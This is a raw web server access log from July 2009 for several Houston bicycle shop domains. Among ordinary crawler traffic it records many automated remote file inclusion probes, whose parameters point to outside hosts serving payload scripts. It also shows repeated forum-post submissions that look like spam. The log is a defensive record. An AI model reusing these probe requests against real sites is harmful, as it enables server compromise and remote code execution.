38.100.41.113 - - [13/Jul/2009:01:14:25 -0700] "GET /translations/Portuguese.txt HTTP/1.1" 200 33065 "http://www.bicyclestoreshouston.com/translations/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" "www.bicyclestoreshouston.com"
38.100.41.113 - - [13/Jul/2009:01:14:26 -0700] "GET /translations/Polish.txt HTTP/1.1" 200 33091 "http://www.bicyclestoreshouston.com/translations/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" "www.bicyclestoreshouston.com"
38.100.41.113 - - [13/Jul/2009:01:14:26 -0700] "GET /translations/German.txt HTTP/1.1" 200 29272 "http://www.bicyclestoreshouston.com/translations/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" "www.bicyclestoreshouston.com"
38.100.41.113 - - [13/Jul/2009:01:14:26 -0700] "GET /translations/Finnish.txt HTTP/1.1" 200 32278 "http://www.bicyclestoreshouston.com/translations/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" "www.bicyclestoreshouston.com"
38.100.41.113 - - [13/Jul/2009:01:14:26 -0700] "GET /translations/Galician.txt HTTP/1.1" 200 33430 "http://www.bicyclestoreshouston.com/translations/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" "www.bicyclestoreshouston.com"
38.100.41.113 - - [13/Jul/2009:01:14:26 -0700] "GET /translations/Danish.txt HTTP/1.1" 200 31970 "http://www.bicyclestoreshouston.com/translations/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" "www.bicyclestoreshouston.com"
38.100.41.113 - - [13/Jul/2009:01:14:27 -0700] "GET /translations/Japanese.txt HTTP/1.1" 200 32739 "http://www.bicyclestoreshouston.com/translations/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" "www.bicyclestoreshouston.com"
38.100.41.113 - - [13/Jul/2009:01:14:27 -0700] "GET /translations/Chinese-Big5.txt HTTP/1.1" 200 32265 "http://www.bicyclestoreshouston.com/translations/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" "www.bicyclestoreshouston.com"
38.100.41.113 - - [13/Jul/2009:01:14:27 -0700] "GET /translations/Italian.txt HTTP/1.1" 200 33975 "http://www.bicyclestoreshouston.com/translations/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" "www.bicyclestoreshouston.com"
38.100.41.113 - - [13/Jul/2009:01:14:28 -0700] "GET /translations/Chinese-GB2312.txt HTTP/1.1" 200 26834 "http://www.bicyclestoreshouston.com/translations/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" "www.bicyclestoreshouston.com"
38.100.41.113 - - [13/Jul/2009:01:14:28 -0700] "GET /translations/Korean.txt HTTP/1.1" 200 32652 "http://www.bicyclestoreshouston.com/translations/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" "www.bicyclestoreshouston.com"
38.100.41.113 - - [13/Jul/2009:01:14:28 -0700] "GET /translations/Hungarian.txt HTTP/1.1" 200 32528 "http://www.bicyclestoreshouston.com/translations/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" "www.bicyclestoreshouston.com"
38.100.41.113 - - [13/Jul/2009:01:14:28 -0700] "GET /translations/Icelandic.txt HTTP/1.1" 200 32529 "http://www.bicyclestoreshouston.com/translations/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" "www.bicyclestoreshouston.com"
38.100.41.113 - - [13/Jul/2009:01:14:29 -0700] "GET /translations/French.txt HTTP/1.1" 200 39051 "http://www.bicyclestoreshouston.com/translations/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" "www.bicyclestoreshouston.com"
38.100.41.113 - - [13/Jul/2009:01:14:29 -0700] "GET /translations/Norwegian.txt HTTP/1.1" 200 31468 "http://www.bicyclestoreshouston.com/translations/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" "www.bicyclestoreshouston.com"
38.100.41.113 - - [13/Jul/2009:01:14:29 -0700] "GET /translations/English-US.txt HTTP/1.1" 200 32000 "http://www.bicyclestoreshouston.com/translations/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" "www.bicyclestoreshouston.com"
38.100.41.113 - - [13/Jul/2009:01:15:38 -0700] "GET /translations/Turkish.txt HTTP/1.1" 200 32818 "http://www.bicyclestoreshouston.com/translations/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" "www.bicyclestoreshouston.com"
38.100.41.113 - - [13/Jul/2009:01:15:39 -0700] "GET /translations/Swedish.txt HTTP/1.1" 200 31485 "http://www.bicyclestoreshouston.com/translations/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" "www.bicyclestoreshouston.com"
38.100.41.113 - - [13/Jul/2009:01:15:39 -0700] "GET /translations/Spanish.txt HTTP/1.1" 200 28587 "http://www.bicyclestoreshouston.com/translations/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" "www.bicyclestoreshouston.com"
38.100.41.113 - - [13/Jul/2009:01:15:40 -0700] "GET /translations/Russian.txt HTTP/1.1" 200 33248 "http://www.bicyclestoreshouston.com/translations/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" "www.bicyclestoreshouston.com"
38.100.41.113 - - [13/Jul/2009:01:15:41 -0700] "GET /translations/Portuguese_BR.txt HTTP/1.1" 200 28418 "http://www.bicyclestoreshouston.com/translations/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" "www.bicyclestoreshouston.com"
38.100.41.113 - - [13/Jul/2009:01:15:42 -0700] "GET /translations/Welsh.txt HTTP/1.1" 200 35212 "http://www.bicyclestoreshouston.com/translations/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" "www.bicyclestoreshouston.com"
80.247.76.181 - - [13/Jul/2009:01:22:33 -0700] "GET /logs/access.log%20//skin/ggambo7002_board/write.php?dir=http://90plan.ovh.net/~mdatourc//administrator/components/com_joomla-visites/core/ivid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "houstonbikeshop.com"
119.63.193.75 - - [13/Jul/2009:01:27:07 -0700] "GET /bullitinboard/viewtopic.php HTTP/1.1" 200 128 "-" "Baiduspider+(+http://www.baidu.jp/spider/)" "www.svbikes.com"
216.129.119.14 - - [13/Jul/2009:01:27:37 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" "bicyclestoreshouston.com"
119.63.193.75 - - [13/Jul/2009:01:29:13 -0700] "GET /bullitinboard/viewtopic.php?p=5049 HTTP/1.1" 200 533 "-" "Baiduspider+(+http://www.baidu.jp/spider/)" "www.svbikes.com"
200.105.207.244 - - [13/Jul/2009:01:35:44 -0700] "GET /logs/access.log%20%20//skin/zero_vote/error.php?dir=http://211.179.234.210:8000/design07/user/user/info//fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
81.19.66.38 - - [13/Jul/2009:01:58:28 -0700] "GET /bullitinboard/viewtopic.php?p=1625 HTTP/1.1" 200 533 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
81.19.66.38 - - [13/Jul/2009:01:58:29 -0700] "GET /bullitinboard/viewtopic.php?p=1663 HTTP/1.1" 200 533 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
81.19.66.38 - - [13/Jul/2009:01:58:29 -0700] "GET /bullitinboard/viewtopic.php?p=1968 HTTP/1.1" 200 533 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
81.19.66.38 - - [13/Jul/2009:01:58:29 -0700] "GET /bullitinboard/viewtopic.php?p=1972 HTTP/1.1" 200 533 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
81.19.66.38 - - [13/Jul/2009:01:58:30 -0700] "GET /bullitinboard/viewtopic.php?p=2036 HTTP/1.1" 200 533 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
64.157.4.104 - - [13/Jul/2009:02:01:46 -0700] "GET /bullitinboard/viewtopic.php?p=15826 HTTP/1.0" 200 517 "-" "SAMSUNG-SGH-A767/A767UCHI4 SHP/VPP/R5 NetFront/3.4 SMM-MMS/1.2.0 profile/MIDP-2.0 configuration/CLDC-1.1 UP.Link/6.3.1.20.0 Novarra-Vision/7.3" "bicyclestoreshouston.com"
200.105.207.244 - - [13/Jul/2009:02:31:03 -0700] "GET /atom.php5?page=http://knbang.co.kr/security/trans/images/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
200.105.207.244 - - [13/Jul/2009:02:31:03 -0700] "GET /translations//atom.php5?page=http://knbang.co.kr/security/trans/images/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
200.105.207.244 - - [13/Jul/2009:02:31:03 -0700] "GET /translations/Danish.txt%20%20//atom.php5?page=http://knbang.co.kr/security/trans/images/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
91.121.150.170 - - [13/Jul/2009:03:03:25 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.svbikes.com"
91.121.150.170 - - [13/Jul/2009:03:03:25 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.svbikes.com"
220.80.107.83 - - [13/Jul/2009:03:10:19 -0700] "GET /logs/access.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://sunset-travel.ro/en/cache/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "houstonbikeshop.com"
220.80.107.83 - - [13/Jul/2009:03:10:20 -0700] "GET /logs/access.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://sunset-travel.ro/en/cache/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "houstonbikeshop.com"
220.80.107.83 - - [13/Jul/2009:03:10:20 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://sunset-travel.ro/en/cache/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "houstonbikeshop.com"
220.80.107.83 - - [13/Jul/2009:03:10:21 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://sunset-travel.ro/en/cache/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "houstonbikeshop.com"
220.80.107.83 - - [13/Jul/2009:03:10:21 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://sunset-travel.ro/en/cache/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "houstonbikeshop.com"
220.80.107.83 - - [13/Jul/2009:03:10:21 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://sunset-travel.ro/en/cache/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "houstonbikeshop.com"
91.121.150.170 - - [13/Jul/2009:03:15:35 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "bicyclestoreshouston.com"
91.121.150.170 - - [13/Jul/2009:03:15:35 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "bicyclestoreshouston.com"
91.121.150.170 - - [13/Jul/2009:03:17:43 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.svbikes.com"
91.121.150.170 - - [13/Jul/2009:03:21:30 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "houstonbikeshop.com"
91.121.150.170 - - [13/Jul/2009:03:21:32 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "houstonbikeshop.com"
81.19.66.38 - - [13/Jul/2009:03:22:57 -0700] "GET /bullitinboard/viewtopic.php?p=1663 HTTP/1.1" 200 533 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
81.19.66.38 - - [13/Jul/2009:03:22:57 -0700] "GET /bullitinboard/viewtopic.php?p=1968 HTTP/1.1" 200 533 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
91.121.150.170 - - [13/Jul/2009:03:29:06 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "bicyclestoreshouston.com"
91.121.150.170 - - [13/Jul/2009:03:29:15 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.svbikes.com"
91.121.150.170 - - [13/Jul/2009:03:34:57 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "houstonbikeshop.com"
91.121.150.170 - - [13/Jul/2009:03:41:17 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "bicyclestoreshouston.com"
91.121.150.170 - - [13/Jul/2009:03:47:15 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "houstonbikeshop.com"
119.63.198.17 - - [13/Jul/2009:04:05:28 -0700] "GET /bullitinboard/viewtopic.php?p=3417 HTTP/1.1" 200 533 "-" "Baiduspider+(+http://www.baidu.jp/spider/)" "www.svbikes.com"
119.63.198.4 - - [13/Jul/2009:04:06:55 -0700] "GET /bullitinboard/viewtopic.php?p=13188 HTTP/1.1" 200 533 "-" "Baiduspider+(+http://www.baidu.jp/spider/)" "www.svbikes.com"
65.55.106.138 - - [13/Jul/2009:04:23:35 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "bicyclestoreshouston.com"
69.163.139.56 - - [13/Jul/2009:04:52:12 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.krob.de/bilder/Bildb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.svbikes.com"
69.163.139.56 - - [13/Jul/2009:04:52:12 -0700] "GET /translations//tools/send_reminders.php?noSet=0&includedir=http://www.krob.de/bilder/Bildb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.svbikes.com"
69.163.139.56 - - [13/Jul/2009:04:52:12 -0700] "GET /translations/Korean.txt//tools/send_reminders.php?noSet=0&includedir=http://www.krob.de/bilder/Bildb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.svbikes.com"
72.30.142.168 - - [13/Jul/2009:04:52:56 -0700] "GET /bullitinboard/viewtopic.php?p=4076 HTTP/1.0" 200 517 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "svbikes.com"
69.163.139.56 - - [13/Jul/2009:04:55:29 -0700] "GET /translations/Hungarian.txt//tools/send_reminders.php?noSet=0&includedir=http://www.krob.de/bilder/Bildb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "houstonbikeshop.com"
69.163.139.56 - - [13/Jul/2009:04:55:29 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.krob.de/bilder/Bildb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "houstonbikeshop.com"
69.163.139.56 - - [13/Jul/2009:04:55:29 -0700] "GET /translations//tools/send_reminders.php?noSet=0&includedir=http://www.krob.de/bilder/Bildb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "houstonbikeshop.com"
69.163.139.56 - - [13/Jul/2009:04:55:34 -0700] "GET /translations/Swedish.txt//tools/send_reminders.php?noSet=0&includedir=http://www.krob.de/bilder/Bildb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "houstonbikeshop.com"
69.59.21.101 - - [13/Jul/2009:04:56:49 -0700] "GET /translations/Hungarian.txt//tools/send_reminders.php?noSet=0&includedir=http://www.krob.de/bilder/Bildb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "houstonbikeshop.com"
69.59.21.101 - - [13/Jul/2009:04:56:49 -0700] "GET /translations//tools/send_reminders.php?noSet=0&includedir=http://www.krob.de/bilder/Bildb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "houstonbikeshop.com"
69.59.21.101 - - [13/Jul/2009:04:56:49 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.krob.de/bilder/Bildb?? HTTP/1.0" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "houstonbikeshop.com"
69.59.21.101 - - [13/Jul/2009:04:56:53 -0700] "GET /translations/Swedish.txt//tools/send_reminders.php?noSet=0&includedir=http://www.krob.de/bilder/Bildb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "houstonbikeshop.com"
69.59.21.101 - - [13/Jul/2009:04:56:53 -0700] "GET /translations//tools/send_reminders.php?noSet=0&includedir=http://www.krob.de/bilder/Bildb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "houstonbikeshop.com"
69.59.21.101 - - [13/Jul/2009:04:56:53 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.krob.de/bilder/Bildb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "houstonbikeshop.com"
69.59.21.101 - - [13/Jul/2009:04:56:53 -0700] "GET /translations/Hungarian.txt//tools/send_reminders.php?noSet=0&includedir=http://www.krob.de/bilder/Bildb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "houstonbikeshop.com"
69.59.21.101 - - [13/Jul/2009:04:56:53 -0700] "GET /translations/Swedish.txt//tools/send_reminders.php?noSet=0&includedir=http://www.krob.de/bilder/Bildb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "houstonbikeshop.com"
87.230.9.68 - - [13/Jul/2009:04:57:21 -0700] "GET /translations/Hungarian.txt//tools/send_reminders.php?noSet=0&includedir=http://www.krob.de/bilder/Bildb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "houstonbikeshop.com"
87.230.9.68 - - [13/Jul/2009:04:57:22 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.krob.de/bilder/Bildb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "houstonbikeshop.com"
87.230.9.68 - - [13/Jul/2009:04:57:22 -0700] "GET /translations//tools/send_reminders.php?noSet=0&includedir=http://www.krob.de/bilder/Bildb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "houstonbikeshop.com"
87.230.9.68 - - [13/Jul/2009:04:57:25 -0700] "GET /translations/Swedish.txt//tools/send_reminders.php?noSet=0&includedir=http://www.krob.de/bilder/Bildb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "houstonbikeshop.com"
87.230.9.68 - - [13/Jul/2009:04:58:34 -0700] "GET /translations/German.txt//tools/send_reminders.php?noSet=0&includedir=http://www.krob.de/bilder/Bildb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.svbikes.com"
87.230.9.68 - - [13/Jul/2009:04:58:34 -0700] "GET /translations//tools/send_reminders.php?noSet=0&includedir=http://www.krob.de/bilder/Bildb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.svbikes.com"
87.230.9.68 - - [13/Jul/2009:04:58:34 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.krob.de/bilder/Bildb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.svbikes.com"
69.59.21.101 - - [13/Jul/2009:05:01:33 -0700] "GET /translations/Korean.txt//tools/send_reminders.php?noSet=0&includedir=http://www.krob.de/bilder/Bildb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.svbikes.com"
69.59.21.101 - - [13/Jul/2009:05:01:33 -0700] "GET /translations//tools/send_reminders.php?noSet=0&includedir=http://www.krob.de/bilder/Bildb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.svbikes.com"
69.59.21.101 - - [13/Jul/2009:05:01:33 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.krob.de/bilder/Bildb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.svbikes.com"
69.59.21.101 - - [13/Jul/2009:05:01:38 -0700] "GET /translations/Norwegian.txt//tools/send_reminders.php?noSet=0&includedir=http://www.krob.de/bilder/Bildb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.svbikes.com"
69.59.21.101 - - [13/Jul/2009:05:02:06 -0700] "GET /translations/Korean.txt//tools/send_reminders.php?noSet=0&includedir=http://www.krob.de/bilder/Bildb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.svbikes.com"
69.59.21.101 - - [13/Jul/2009:05:02:12 -0700] "GET /translations//tools/send_reminders.php?noSet=0&includedir=http://www.krob.de/bilder/Bildb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.svbikes.com"
69.59.21.101 - - [13/Jul/2009:05:02:12 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.krob.de/bilder/Bildb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.svbikes.com"
81.19.66.38 - - [13/Jul/2009:05:02:19 -0700] "GET /bullitinboard/viewtopic.php?p=1663 HTTP/1.1" 200 533 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
81.19.66.38 - - [13/Jul/2009:05:02:20 -0700] "GET /bullitinboard/viewtopic.php?p=1968 HTTP/1.1" 200 533 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
81.19.66.38 - - [13/Jul/2009:05:02:21 -0700] "GET /bullitinboard/viewtopic.php?p=1972 HTTP/1.1" 200 533 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
81.19.66.38 - - [13/Jul/2009:05:02:22 -0700] "GET /bullitinboard/viewtopic.php?p=2005 HTTP/1.1" 200 533 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
81.19.66.38 - - [13/Jul/2009:05:02:22 -0700] "GET /bullitinboard/viewtopic.php?p=1625 HTTP/1.1" 200 533 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
87.230.9.68 - - [13/Jul/2009:05:03:03 -0700] "GET /translations/Korean.txt//tools/send_reminders.php?noSet=0&includedir=http://www.krob.de/bilder/Bildb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.svbikes.com"
65.254.32.2 - - [13/Jul/2009:05:04:08 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.smilewig.com/bbs/chase/images/remember.txt????????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
65.254.32.2 - - [13/Jul/2009:05:04:08 -0700] "GET /translations/Swedish.txt%20%20//tools/send_reminders.php?noSet=0&includedir=http://www.smilewig.com/bbs/chase/images/remember.txt????????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
65.254.32.2 - - [13/Jul/2009:05:04:09 -0700] "GET /translations/Hungarian.txt%20%20//tools/send_reminders.php?noSet=0&includedir=http://www.smilewig.com/bbs/chase/images/remember.txt????????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
65.254.32.2 - - [13/Jul/2009:05:04:09 -0700] "GET /translations//tools/send_reminders.php?noSet=0&includedir=http://www.smilewig.com/bbs/chase/images/remember.txt????????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
87.106.245.84 - - [13/Jul/2009:05:14:48 -0700] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://5euroshirts.com/modules/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "houstonbikeshop.com"
87.106.245.84 - - [13/Jul/2009:05:14:48 -0700] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://5euroshirts.com/modules/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "houstonbikeshop.com"
110.45.144.161 - - [13/Jul/2009:05:18:02 -0700] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://tentenclub.net/zboard/zboard_data/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "houstonbikeshop.com"
110.45.144.161 - - [13/Jul/2009:05:18:02 -0700] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://tentenclub.net/zboard/zboard_data/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "houstonbikeshop.com"
65.55.106.172 - - [13/Jul/2009:05:21:07 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "bicyclestoreshouston.com"
211.236.242.164 - - [13/Jul/2009:05:26:44 -0700] "GET /logs///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://jst.or.th/index1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
211.236.242.164 - - [13/Jul/2009:05:26:45 -0700] "GET /logs/access.log%20%20///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://jst.or.th/index1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
211.236.242.164 - - [13/Jul/2009:05:26:45 -0700] "GET //administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://jst.or.th/index1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
65.55.211.68 - - [13/Jul/2009:05:30:41 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.svbikes.com"
65.55.211.68 - - [13/Jul/2009:05:30:41 -0700] "GET /blog/ HTTP/1.1" 401 395 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.svbikes.com"
